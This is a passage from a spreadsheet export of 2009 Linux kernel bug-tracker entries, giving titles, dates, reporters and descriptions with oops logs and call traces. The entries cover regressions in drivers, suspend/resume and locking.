EFLAGS: 00010246 CPU: 1 [ 2.111833] EIP is at 0x0 [ 2.111935] EAX: 00000000 EBX: c1fa3ba0 ECX: c1fed76c EDX: c1fa3ba0 [ 2.112042] ESI: f6b1c110 EDI: 00000000 EBP: f69dfd60 ESP: f69dfd48 [ 2.112042] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 2.112042] Process modprobe (pid: 1018, ti=f69de000 task=f64283f0 task.ti=f69de000) [ 2.112042] Stack: [ 2.112042] c0156da4 f6b5c000 00000000 f6836b00 f69c8660 00000000 f69dfd70 c0156e2c [ 2.112572] &lt;0&gt; 00000000 f6836b00 f69dfd90 f830600f 00000000 f6b1c110 00000020 f6836b00 [ 2.112572] &lt;0&gt; f69c8660 f6b5c000 f69dfdc4 f83064c9 000080d0 f6b5cca0 f6b5ccdc f6b5ccd4 [ 2.112572] Call Trace: [ 2.112572] [&lt;c0156da4&gt;] ? read_cache_page_async+0x72/0xee [ 2.112572] [&lt;c0156e2c&gt;] ? read_cache_page+0xc/0x3c [ 2.112572] [&lt;f830600f&gt;] ? i915_gem_object_get_pages+0x8c/0xd7 [i915] [ 2.112572] [&lt;f83064c9&gt;] ? i915_gem_object_bind_to_gtt+0x167/0x20f [i915] [ 2.112572] [&lt;f830658d&gt;] ? i915_gem_object_pin+0x1c/0x149 [i915] [ 2.112572] [&lt;f82ad853&gt;] ? drm_gem_object_alloc+0x69/0xaa [drm] [ 2.112572] [&lt;f8306853&gt;] ? i915_gem_init_ringbuffer+0x199/0x3de [i915] [ 2.112572] [&lt;f82ffa59&gt;] ? i915_driver_load+0x907/0x9da [i915] [ 2.112572] [&lt;f82afa14&gt;] ? drm_get_dev+0x2b8/0x395 [drm] [ 2.112572] [&lt;f83181fc&gt;] ? i915_pci_probe+0xd/0x8a [i915] [ 2.112572] [&lt;c0257c52&gt;] ? local_pci_probe+0xe/0x10 [ 2.112572] [&lt;c0257dfc&gt;] ? pci_device_probe+0x43/0x66 [ 2.112572] [&lt;c02aeed2&gt;] ? driver_probe_device+0x79/0xed [ 2.112572] [&lt;c02aef89&gt;] ? __driver_attach+0x43/0x5f [ 2.112572] [&lt;c02ae766&gt;] ? bus_for_each_dev+0x3d/0x67 [ 2.112572] [&lt;c02aedab&gt;] ? driver_attach+0x14/0x16 [ 2.112572] [&lt;c02aef46&gt;] ? __driver_attach+0x0/0x5f [ 2.112572] [&lt;c02aeb0b&gt;] ? bus_add_driver+0x8f/0x1bc [ 2.112572] [&lt;c02af1b7&gt;] ? driver_register+0x79/0xe0 [ 2.112572] [&lt;c011eaaf&gt;] ? finish_task_switch+0x56/0x95 [ 2.112572] [&lt;c02580fe&gt;] ? __pci_register_driver+0x38/0x96 [ 2.112572] [&lt;f82ac508&gt;] ? drm_init+0x5d/0xb5 [drm] [ 2.112572] [&lt;f832a046&gt;] ? i915_init+0x46/0x48 [i915] [ 2.112572] [&lt;c010104f&gt;] ? do_one_initcall+0x4a/0x10c [ 2.112572] [&lt;f832a000&gt;] ? i915_init+0x0/0x48 [i915] [ 2.112572] [&lt;c011f3e1&gt;] ? try_to_wake_up+0x196/0x1a0 [ 2.112572] [&lt;c011b304&gt;] ? need_resched+0x14/0x1e [ 2.112572] [&lt;c0372de9&gt;] ? preempt_schedule+0x3d/0x43 [ 2.112572] [&lt;c01439db&gt;] ? sys_init_module+0xa7/0x1b8 [ 2.112572] [&lt;c0102931&gt;] ? syscall_call+0x7/0xb [ 2.112572] Code: Bad EIP value. [ 2.112572] EIP: [&lt;00000000&gt;] 0x0 SS:ESP 0068:f69dfd48 [ 2.112572] CR2: 0000000000000000 [ 2.135981] ---[ end trace f30cb2ef8529a6f3 ]---</t>
  </si>
  <si>
    <t>Macintosh mouse button emulation sending both mousebutton and keypress events</t>
  </si>
  <si>
    <t>2009-07-15 14:54 UTC</t>
  </si>
  <si>
    <t>Olivier Mehani</t>
  </si>
  <si>
    <t>2010-05-24 20:46 UTC</t>
  </si>
  <si>
    <t>On Macintosh computers with only one mouse button (e.g. iBook laptops), activating the CONFIG_MAC_EMUMOUSEBTN kernel option allows to associate second and third button events to Fn+Key. This functionnality can be activated and deactivated at runtime. When activated, it creates a new input devices which is recognized as a mouse and only send button 2 and 3 events. The problem is that, when activated, using one of the key sequences associated to mouse button presses, the kernel generates two events: - the mouse click event as desired and, - the normal keypress event. This causes problems such as the following example: using X.org and an xterm, with keys Fn+LCtrl and Fn+LSuper respectively associated to Buttons 2 and 3. While trying to paste something from the buffer (using button 1), the xterm gets both a Button 2 press event, and a LCtrl event. This in turns triggers another behavior than pasting the content of the buffer in xterm (configuration menu). The expected behavior would be that when mouse button emulation is activated (dev.mac_hid.mouse_button_emulation = 1), no keypress event is generated on the associated keyboard device when key dev.mac_hid.mouse_button{2,3}_keycode is pressed in combination with the Fn key). Other reports of this problem (initially diagnozed when Xorg changed its input device grabbing policy) can be found in the RedHat Bugzilla, as given in the URL attribute of this ticket.</t>
  </si>
  <si>
    <t>NULL pointer dereference loading powernowk8</t>
  </si>
  <si>
    <t>2009-07-15 18:00 UTC</t>
  </si>
  <si>
    <t>Kurt Roeckx</t>
  </si>
  <si>
    <t>2010-01-19 22:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 22358 [details] kernel log Hi, When the "loadcpufreq" init script loads the kernel module (powernow_k8?), I get the following error: kernel: [ 39.822807] BUG: unable to handle kernel NULL pointer dereference at 0000000000000024 kernel: [ 39.824035] IP: [&lt;ffffffffa034b094&gt;] powernowk8_cpu_init+0x30d/0xa07 [powernow_k8] I'm using debian's kernel linux-image-2.6.30-1-amd64 2.6.30-2 If I don't start that script, I do not get the error.</t>
  </si>
  <si>
    <t>System freeze at resume after suspend to RAM</t>
  </si>
  <si>
    <t>2009-07-15 18:42 UTC</t>
  </si>
  <si>
    <t>2009-08-05 11:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 22360 [details] dmesg output after boot for 2.6.31-rc3 Since early 2.6.31-rc (rc1 not tested, rc2 and rc3 fail), my Laptop doesn't resume from suspend to RAM anymore. Works perfectly with 2.6.30.1 System : Acer Aspire 1511 LMi CPU: Athlon 64 3GHz in 64 bits mode Distro Bluewhite64 12.1 (64 bit native Slackware) lspci, dmesg and lsusb appended for more info.</t>
  </si>
  <si>
    <t>arch/s390/kernel/early.c: 2 * bad calls to printf</t>
  </si>
  <si>
    <t>2009-07-16 19:33 UTC</t>
  </si>
  <si>
    <t>2012-06-13 13:25 UTC</t>
  </si>
  <si>
    <t>Line 136 of the above file has sprintf(defsys_cmd, "%s EW MINSIZE=%.7iK PARMREGS=0-13", defsys_cmd, min_size); To the best of my knowledge, it is undefined in ISO C to have source and destination buffers the same. Suggest code rework. Same problem at line 130 sprintf(defsys_cmd, "%s EW %.5X-%.5X", defsys_cmd, sinitrd_pfn, einitrd_pfn);</t>
  </si>
  <si>
    <t>2.6.31 regression - boot crash in rcu_process_callbacks - DELL XPS M1330</t>
  </si>
  <si>
    <t>2.6.31-rc3+ (2009-07-17)</t>
  </si>
  <si>
    <t>2009-07-17 14:49 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 22393 [details] Photo of the screen after the crash Kernel 2.6.31 does not boot on my laptop (a DELL XPS M1330). I have tried rc1, rc2, rc3 and today's daily build but none of those will boot on my laptop. I get the following call trace with today's daily build: rcu_do_batch+0x27/0x90 __rcu_process_callbacks+0xc8/0x100 tick_handle_oneshot_broadcast+0xdd/0x100 rcu_process_callbacks+0x20/0x40 timer_interrupt+0x21/0x70 handle_IRQ_event+0x56/0x120 do_softirq+0x3c/0x40 irq_exit+0x5c/0x70 do_IRQ+0x4f/0xc0 common_interrupt+0x29/0x30 sys_getresuid+0x3b/0x70 acpi_idle_enter_bm+0x19a/0x1c9 cpuidle_idle_call+0x6f/0xc0 cpu_idle+0x42/0x80 start_secondary+0xae/0cd0</t>
  </si>
  <si>
    <t>iBook G4 doesn't suspend since 2ed8d2b3a8</t>
  </si>
  <si>
    <t>2.6.31-rc3</t>
  </si>
  <si>
    <t>2009-07-18 20:18 UTC</t>
  </si>
  <si>
    <t>Jörg Sommer</t>
  </si>
  <si>
    <t>2009-10-26 18:58 UTC</t>
  </si>
  <si>
    <t>Hi, I've an iBook G4 and since 2.6.30-rc1 my machine doesn't suspend to RAM. When doing “echo mem &gt; /sys/power/state”, the screen gets black but the fan is still running and the LED of caps lock still works. I can't resume the system. I can only do a reset. I've bisected the problem and found 2ed8d2b as the first bad bug. With 2ed8d2b~1 I can suspend the machine, but not with 2ed8d2b. commit 2ed8d2b3a81bdbb0418301628ccdb008ac9f40b7 Author: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Date: Mon Mar 16 22:34:06 2009 +0100 PM: Rework handling of interrupts during suspend-resume % cat /proc/cpuinfo processor : 0 cpu : 7455, altivec supported clock : 606.000000MHz revision : 3.3 (pvr 8001 0303) bogomips : 36.73 timebase : 18432000 platform : PowerMac model : PowerBook6,3 machine : PowerBook6,3 motherboard : PowerBook6,3 MacRISC3 Power Macintosh detected as : 287 (iBook G4) pmac flags : 0000001b L2 cache : 256K unified pmac-generation : NewWorld Memory : 640 MB % lspci -v -s 0:10 0000:00:10.0 VGA compatible controller: ATI Technologies Inc M9+ 5C63 [Radeon Mobility 9200 (AGP)] (rev 01) (prog-if 00 [VGA controller]) Subsystem: ATI Technologies Inc Apple iBook G4 2004 Flags: bus master, 66MHz, medium devsel, latency 255, IRQ 48 Memory at 98000000 (32-bit, prefetchable) [size=128M] I/O ports at 0400 [size=256] Memory at 90000000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at f1000000 [size=128K] Capabilities: &lt;access denied&gt; Kernel driver in use: radeonfb Bye, Jörg.</t>
  </si>
  <si>
    <t>system does not boot due to device-mapper error</t>
  </si>
  <si>
    <t>2.6.31+</t>
  </si>
  <si>
    <t>2009-07-21 00:03 UTC</t>
  </si>
  <si>
    <t>Roman Shtylman</t>
  </si>
  <si>
    <t>2009-08-02 21:35 UTC</t>
  </si>
  <si>
    <t>When trying to boot into any 2.6.31+ kernel my system hangs with the error: "device-mapper: table: 252:0: sda too small for target" The above error just keeps getting echoed out to the screen. This did not happen prior to the .31 kernel(s). / is on two disks in raid 0. Each disk is 32GB making a total of 64GB for root. There is 37GB of free space on root so free space is not the issue. I use dmraid for my multidisk setup, and up until this kernel line, have never experience such an error in booting. A link to the launchpad (Ubuntu) bug with other users experiencing the same problem: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/398059</t>
  </si>
  <si>
    <t>dv-grab firewire camera causes kernel crashes in 64 bit kernels</t>
  </si>
  <si>
    <t>2.6.29.5-191.fc11.x86_64 #1 SMP</t>
  </si>
  <si>
    <t>2009-07-22 08:25 UTC</t>
  </si>
  <si>
    <t>Paul Johnson</t>
  </si>
  <si>
    <t>2010-02-09 17:11 UTC</t>
  </si>
  <si>
    <t>I've had this problem a while, and the history is documented in Fedora bug 471708. When I try to download digital video from my DV camera using FireWire I get dropped data. Not long after I get kernel oops or my computer locks up (its normally very stable). I'm running Fedora 64 bit on a quad Core 2 machine. However another machine running 32 bit Ubuntu (dual P4) works fine. Both machines are using the same TSB43AB23 chip, so I suspect the problem is in the 64 bit compilation of the driver for that chip. Hence I'm posting the bug report here.</t>
  </si>
  <si>
    <t>oprofile: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2009-07-22 13:35 UTC</t>
  </si>
  <si>
    <t>Jerome Marchand</t>
  </si>
  <si>
    <t>2012-03-13 22:57 UTC</t>
  </si>
  <si>
    <t>I've hit a "possible circular locking dependency detected" while trying to use oprofile while doing heavy I/O. ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.31-rc2 #53 ------------------------------------------------------- oprofiled/6216 is trying to acquire lock: (&amp;mm-&gt;mmap_sem){++++++}, at: [&lt;c048e1e1&gt;] might_fault+0x43/0x80 but task is already holding lock: (dcookie_mutex){+.+.+.}, at: [&lt;c04e576b&gt;] sys_lookup_dcookie+0x2a/0x11c which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (dcookie_mutex){+.+.+.}: [&lt;c044d0ad&gt;] __lock_acquire+0x987/0xaf6 [&lt;c044d2a5&gt;] lock_acquire+0x89/0xa6 [&lt;c0691244&gt;] __mutex_lock_common+0x35/0x2bc [&lt;c0691563&gt;] mutex_lock_nested+0x2e/0x36 [&lt;c04e587d&gt;] get_dcookie+0x20/0xf7 [&lt;faaeab83&gt;] sync_buffer+0x180/0x395 [oprofile] [&lt;faaeada6&gt;] task_exit_notify+0xe/0x12 [oprofile] [&lt;c0693f7f&gt;] notifier_call_chain+0x2b/0x4a [&lt;c0443701&gt;] __blocking_notifier_call_chain+0x37/0x4c [&lt;c0443722&gt;] blocking_notifier_call_chain+0xc/0xe [&lt;c0445d86&gt;] profile_task_exit+0x11/0x13 [&lt;c0431469&gt;] do_exit+0x19/0x5ef [&lt;c0431a9d&gt;] do_group_exit+0x5e/0x85 [&lt;c0431ad7&gt;] sys_exit_group+0x13/0x17 [&lt;c04029b4&gt;] sysenter_do_call+0x12/0x32 [&lt;ffffffff&gt;] 0xffffffff -&gt; #0 (&amp;mm-&gt;mmap_sem){++++++}: [&lt;c044cfbf&gt;] __lock_acquire+0x899/0xaf6 [&lt;c044d2a5&gt;] lock_acquire+0x89/0xa6 [&lt;c048e1fe&gt;] might_fault+0x60/0x80 [&lt;c05348d8&gt;] copy_to_user+0x2c/0xfc [&lt;c04e5831&gt;] sys_lookup_dcookie+0xf0/0x11c [&lt;c04029b4&gt;] sysenter_do_call+0x12/0x32 [&lt;ffffffff&gt;] 0xffffffff other info that might help us debug this: 1 lock held by oprofiled/6216: #0: (dcookie_mutex){+.+.+.}, at: [&lt;c04e576b&gt;] sys_lookup_dcookie+0x2a/0x11c stack backtrace: Pid: 6216, comm: oprofiled Not tainted 2.6.31-rc2 #53 Call Trace: [&lt;c0690158&gt;] ? printk+0xf/0x17 [&lt;c044c462&gt;] print_circular_bug_tail+0x5d/0x68 [&lt;c044cfbf&gt;] __lock_acquire+0x899/0xaf6 [&lt;c044d2a5&gt;] lock_acquire+0x89/0xa6 [&lt;c048e1e1&gt;] ? might_fault+0x43/0x80 [&lt;c048e1fe&gt;] might_fault+0x60/0x80 [&lt;c048e1e1&gt;] ? might_fault+0x43/0x80 [&lt;c05348d8&gt;] copy_to_user+0x2c/0xfc [&lt;c04e5831&gt;] sys_lookup_dcookie+0xf0/0x11c [&lt;c04029b4&gt;] sysenter_do_call+0x12/0x32</t>
  </si>
  <si>
    <t>Ooops on uplug</t>
  </si>
  <si>
    <t>2.6.31-rc</t>
  </si>
  <si>
    <t>2009-07-22 20:46 UTC</t>
  </si>
  <si>
    <t>2009-08-03 15:32 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] [usb-serial] fix Ooops on uplug Submitter : Daniel Mack &lt;daniel@caiaq.de&gt; Date : 2009-07-20 17:51 References : http://marc.info/?l=linux-kernel&amp;m=124811234302786&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; Handled-By : Alan Cox &lt;alan@linux.intel.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Hangups in n_tty_read()</t>
  </si>
  <si>
    <t>2009-07-22 20:53 UTC</t>
  </si>
  <si>
    <t>2009-08-03 16:07 UTC</t>
  </si>
  <si>
    <t>Subject : Hangups in n_tty_read() Submitter : Johannes Weiner &lt;hannes@cmpxchg.org&gt; Date : 2009-07-16 18:48 References : http://marc.info/?l=linux-kernel&amp;m=124777019920579&amp;w=4 Notify-Also : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>emacs -nw compilation doesn't show the error message</t>
  </si>
  <si>
    <t>2009-07-23 06:22 UTC</t>
  </si>
  <si>
    <t>Aneesh Kumar K.V</t>
  </si>
  <si>
    <t>2009-08-03 15:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 22461 [details] strace log showing buggy behaviour To reproduce write a small program something like below main() { printf("%d\n",i); } Now in emacs say ALT-x compile use cc a.c command to compile. It is supposed to show the error messages in the compile window. With 2.6.30 it works fine. Where as 2.6.31-rc3 it doesn't list me any error. Reverting the patch d945cb9cce20ac7143c2de8d88b187f62db99bdc makes it work. Doing an strace on the failure case shows me that on the parent we don't get woken up in select on /dev/ptmx immediately when the data is avaiable in /dev/pts/3. So the child exit and the select timeout and a read from /dev/ptmx return EIO. Relevant strace log is attached below -aneesh</t>
  </si>
  <si>
    <t>system freeze when switching to console</t>
  </si>
  <si>
    <t>2009-07-23 17:57 UTC</t>
  </si>
  <si>
    <t>2009-09-11 14:48 UTC</t>
  </si>
  <si>
    <t>I have a Sony Vaio VGN-Z540 laptop. This machine was able to suspend/resume without problem in 2.6.31-rc2, but in 2.6.31-rc3 it started freezing up when I try to suspend. The system freezes with a blank screen and the keyboard leds start blinking. I have to use system power button to shut it down. The problem is not limited to suspend though - the same type of freeze occurs when I try to switch from X to a console (ctrl-alt-f1). The same problem exists in 2.6.31-rc4 (head 4be3bd7849165e7efa6b0b35a23d6a3598d97465). When I booth without gdm and trigger suspend with "echo disk &gt; /sys/power/state" it works fine. I was able to bisect the problem to the commit below: commit 44c695b13bee558c73a89bc79f6253a4ba637386 Merge: eee33ab... 0611254... Author: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Date: Fri Jul 10 19:14:48 2009 -0700 Merge branch 'linux-next' of git://git.infradead.org/ubifs-2.6 * 'linux-next' of git://git.infradead.org/ubifs-2.6: UBIFS: fix corruption dump UBIFS: clean up free space checking UBIFS: small amendments in the LEB scanning code UBIFS: dump a little more in case of corruptions MAINTAINERS: update ahunter's e-mail address UBIFS: allow more than one volume to be mounted UBIFS: fix assertion warning UBIFS: minor spelling and grammar fixes UBIFS: fix 64-bit divisions in debug print UBIFS: few spelling fixes UBIFS: set write-buffer timout to 3-5 seconds UBIFS: slightly optimize write-buffer timer usage UBIFS: improve debugging messaged UBIFS: fix integer overflow warning I don't know how accurate it is though because I tried to do a sanity check on a repo that first has this commit as HEAD and next reverted this repo to HEAD^. The problem was present in both of these repos. .</t>
  </si>
  <si>
    <t>drivers/staging/wlan-ng/p80211netdev.c, wrong #ifdef #endif sequence</t>
  </si>
  <si>
    <t>Latest trunk, 4be3bd7849165e7efa6b0b35a23d6a3598d97465</t>
  </si>
  <si>
    <t>2009-07-23 18:22 UTC</t>
  </si>
  <si>
    <t>2011-01-24 13:00 UTC</t>
  </si>
  <si>
    <t>Replugging USB serial converter uses new device node</t>
  </si>
  <si>
    <t>2009-07-23 22:05 UTC</t>
  </si>
  <si>
    <t>2009-07-28 21:06 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc3: replugging USB serial converter uses new device node Submitter : Ferenc Wagner &lt;wferi@niif.hu&gt; Date : 2009-07-18 20:04 References : http://marc.info/?l=linux-kernel&amp;m=124794754015776&amp;w=4 Notify-Also : Alan Stern &lt;stern@rowland.harvard.edu&gt; Notify-Also : Kay Sievers &lt;kay.sievers@vrfy.org&gt; Notify-Also : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>QLA2XXX driver causes kernel oops with a qla2200</t>
  </si>
  <si>
    <t>2009-07-25 11:03 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:15 UTC</t>
  </si>
  <si>
    <t>Whenever I insert the qla2xxx module, the kernel always oopses. Sometimes, the driver will work and detect the drives, but it will oops again later. I have tried this on multiple machines with different qla2200 cards and they both experience the same oopsing, sometimes resulting in a hard lock. Here is one of the oops on loading the module: [27287.119929] QLogic Fibre Channel HBA Driver: 8.03.00-k4 [27287.120016] qla2xxx 0000:06:01.0: PCI INT A -&gt; GSI 74 (level, low) -&gt; IRQ 74 [27287.120070] qla2xxx 0000:06:01.0: Found an ISP2200, irq 74, iobase 0xffffc20000c5c000 [27287.120281] IRQ 74/qla2xxx: IRQF_DISABLED is not guaranteed on shared IRQs [27287.120309] qla2xxx 0000:06:01.0: Configuring PCI space... [27287.120510] qla2xxx 0000:06:01.0: Configure NVRAM parameters... [27287.205932] qla2xxx 0000:06:01.0: Verifying loaded RISC code... [27287.216038] qla2xxx 0000:06:01.0: firmware: requesting ql2200_fw.bin [27294.548077] qla2xxx 0000:06:01.0: Allocated (252 KB) for firmware dump... [27294.669022] qla2xxx 0000:06:01.0: LIP reset occurred (f7f7). [27294.680099] scsi0 : qla2xxx [27294.818489] qla2xxx 0000:06:01.0: LOOP UP detected (1 Gbps). [27295.684930] BUG: unable to handle kernel NULL pointer dereference at (null) [27295.685892] IP: [&lt;ffffffffa0011910&gt;] qla2x00_prep_ms_fdmi_iocb+0x26/0xbc [qla2xxx] [27295.685892] PGD 1989d1067 PUD 199007067 PMD 0 [27295.685892] Oops: 0002 [#1] SMP [27295.685892] last sysfs file: /sys/devices/pci0000:00/0000:00:06.0/0000:05:00.0/0000:06:01.0/firmware/0000:06:01.0/loading [27295.685892] CPU 3 [27295.685892] Modules linked in: qla2xxx(+) [27295.685892] Pid: 14114, comm: qla2xxx_0_dpc Not tainted 2.6.29-gentoo-r5dl380 #2 ProLiant DL380 G4 [27295.685892] RIP: 0010:[&lt;ffffffffa0011910&gt;] [&lt;ffffffffa0011910&gt;] qla2x00_prep_ms_fdmi_iocb+0x26/0xbc [qla2xxx] [27295.685892] RSP: 0018:ffff88017cdc5c38 EFLAGS: 00010246 [27295.685892] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000010 [27295.685892] RDX: 0000000000000010 RSI: 0000000000000000 RDI: 0000000000000000 [27295.685892] RBP: ffff88017cdc5c40 R08: 0000000000000000 R09: ffff880199bde800 [27295.685892] R10: 0000000000000010 R11: ffff880199bde540 R12: ffff880199bde540 [27295.685892] R13: ffff880199bde800 R14: ffff880199bde540 R15: ffff880199bde540 [27295.685892] FS: 0000000000000000(0000) GS:ffff88019ac52300(0000) knlGS:0000000000000000 [27295.685892] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [27295.685892] CR2: 0000000000000000 CR3: 000000019993f000 CR4: 00000000000006e0 [27295.685892] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [27295.685892] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [27295.685892] Process qla2xxx_0_dpc (pid: 14114, threadinfo ffff88017cdc4000, task ffff8801991314d0) [27295.685892] Stack: [27295.685892] 0000000000000000 ffff88017cdc5c90 ffffffffa0012384 ffff00007cdc5ce0 [27295.685892] ffffffffa000b100 000000cf00000203 0000000000000000 ffff880199bde540 [27295.685892] 0000000000000003 0000000000000000 ffff880199bde540 ffff88017cdc5ce0 [27295.685892] Call Trace: [27295.685892] [&lt;ffffffffa0012384&gt;] qla2x00_fdmi_rhba+0x2f/0x490 [qla2xxx] [27295.685892] [&lt;ffffffffa000b100&gt;] ? qla2x00_get_port_name+0x7a/0xf1 [qla2xxx] [27295.685892] [&lt;ffffffffa0012810&gt;] qla2x00_fdmi_register+0x2b/0x449 [qla2xxx] [27295.685892] [&lt;ffffffffa00067b1&gt;] qla2x00_configure_loop+0x9da/0x13fc [qla2xxx] [27295.685892] [&lt;ffffffffa0009bf3&gt;] ? qla2x00_mailbox_command+0x51a/0x56c [qla2xxx] [27295.685892] [&lt;ffffffffa000b308&gt;] ? qla2x00_get_retry_cnt+0x51/0xd2 [qla2xxx] [27295.685892] [&lt;ffffffffa000726b&gt;] qla2x00_loop_resync+0x98/0xf3 [qla2xxx] [27295.685892] [&lt;ffffffffa00026f2&gt;] qla2x00_do_dpc+0x2c1/0x392 [qla2xxx] [27295.685892] [&lt;ffffffffa0002431&gt;] ? qla2x00_do_dpc+0x0/0x392 [qla2xxx] [27295.685892] [&lt;ffffffff8104af29&gt;] kthread+0x49/0x76 [27295.685892] [&lt;ffffffff8100d1ba&gt;] child_rip+0xa/0x20 [27295.685892] [&lt;ffffffff8104aee0&gt;] ? kthread+0x0/0x76 [27295.685892] [&lt;ffffffff8100d1b0&gt;] ? child_rip+0x0/0x20 [27295.685892] Code: 5b 41 5c 5d c3 55 48 89 e5 48 83 ec 08 49 89 fb 41 89 d2 4c 8b 8f a0 01 00 00 4d 8b 81 70 01 00 00 b9 10 00 00 00 31 c0 4c 89 c7 &lt;f3&gt; ab 41 c6 00 29 41 c6 40 01 01 41 83 b9 30 01 00 00 00 66 41 [27295.685892] RIP [&lt;ffffffffa0011910&gt;] qla2x00_prep_ms_fdmi_iocb+0x26/0xbc [qla2xxx] [27295.685892] RSP &lt;ffff88017cdc5c38&gt; [27295.685892] CR2: 0000000000000000 [27299.116827] ---[ end trace 3eb74739b5f59456 ]--- [27299.689025] qla2xxx 0000:06:01.0: [27299.689027] QLogic Fibre Channel HBA Driver: 8.03.00-k4 [27299.689028] QLogic QLA22xx - [27299.689029] ISP2200: PCI (66 MHz) @ 0000:06:01.0 hdma+, host#=0, fw=2.02.08 TP</t>
  </si>
  <si>
    <t>eeepc-laptop: fix hot-unplug on resume</t>
  </si>
  <si>
    <t>2009-07-25 20:43 UTC</t>
  </si>
  <si>
    <t>2009-08-28 23:22 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] eeepc-laptop: fix hot-unplug on resume Submitter : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Date : 2009-06-29 13:12 References : http://lkml.org/lkml/2009/6/29/150 Handled-By : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Patch : http://patchwork.kernel.org/patch/32926/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>thinkpad boots with backlight low</t>
  </si>
  <si>
    <t>2009-07-25 21:00 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc2: thinkpad boots with backlight low Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-07-15 15:13 References : http://marc.info/?l=linux-kernel&amp;m=124756359126830&amp;w=4 Handled-By : Henrique de Moraes Holschuh &lt;hmh@hmh.eng.br&gt; Notify-Also : Tobias Diedrich &lt;ranma+kernel@tdiedrich.de&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PM/hibernate swapfile regression</t>
  </si>
  <si>
    <t>2009-07-25 21:49 UTC</t>
  </si>
  <si>
    <t>2009-08-02 21:33 UTC</t>
  </si>
  <si>
    <t>Subject : PM/hibernate swapfile regression Submitter : Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt; Date : 2009-07-14 15:54 References : http://marc.info/?l=linux-kernel&amp;m=124757972118196&amp;w=4 Handled-By : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Patch : http://patchwork.kernel.org/patch/36510/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel Oops when trying to suspend with ubifs mounted on block2mtd mtd device</t>
  </si>
  <si>
    <t>2009-07-26 20:40 UTC</t>
  </si>
  <si>
    <t>2009-08-10 13:52 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel Oops when trying to suspend with ubifs mounted on block2mtd mtd device on 2.3.31-rc2 Submitter : Tobias Diedrich &lt;ranma@tdiedrich.de&gt; Date : 2009-07-15 14:20 References : http://marc.info/?l=linux-kernel&amp;m=124766049207807&amp;w=4 Notify-Also : David Brownell &lt;david-b@pacbell.net&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit 15bce40cb3133bcc07d548013df97e4653d363c1 Author: David Woodhouse &lt;David.Woodhouse@intel.com&gt; Date: Sun Apr 5 07:40:58 2009 -0700 [MTD] Restore suspend/resume support for mtd devices This is intended to suspend/resume the _chip_, while we leave board drivers to handle their own suspend/resume for the controller. Signed-off-by: David Woodhouse &lt;David.Woodhouse@intel.com&gt; First-Bad-Commit : 15bce40cb3133bcc07d548013df97e4653d363c1</t>
  </si>
  <si>
    <t>e1000e massive packet loss</t>
  </si>
  <si>
    <t>2009-07-26 20:54 UTC</t>
  </si>
  <si>
    <t>2009-12-07 21:59 UTC</t>
  </si>
  <si>
    <t>Subject : e1000e 2.6.30.1 massive packet loss Submitter : Caleb Cushing &lt;xenoterracide@gmail.com&gt; Date : 2009-07-16 09:49 References : http://marc.info/?l=linux-kernel&amp;m=124773057917887&amp;w=4 Notify-Also : Eric Dumazet &lt;dada1@cosmosbay.com&gt; Notify-Also : Linux Netdev List &lt;netdev@vger.kernel.org&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at include/net/netns/generic.h:41!</t>
  </si>
  <si>
    <t>commit 78af08d</t>
  </si>
  <si>
    <t>2009-07-26 21:15 UTC</t>
  </si>
  <si>
    <t>2009-08-09 23:01 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at include/net/netns/generic.h:41! Submitter : Luca Tettamanti &lt;kronos.it@gmail.com&gt; Date : 2009-07-20 15:27 References : http://lkml.org/lkml/2009/7/20/105 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>KMS oops on 945G system</t>
  </si>
  <si>
    <t>2.6.31-rc3-00096-g78af08d</t>
  </si>
  <si>
    <t>2009-07-26 21:29 UTC</t>
  </si>
  <si>
    <t>2009-08-09 23:15 UTC</t>
  </si>
  <si>
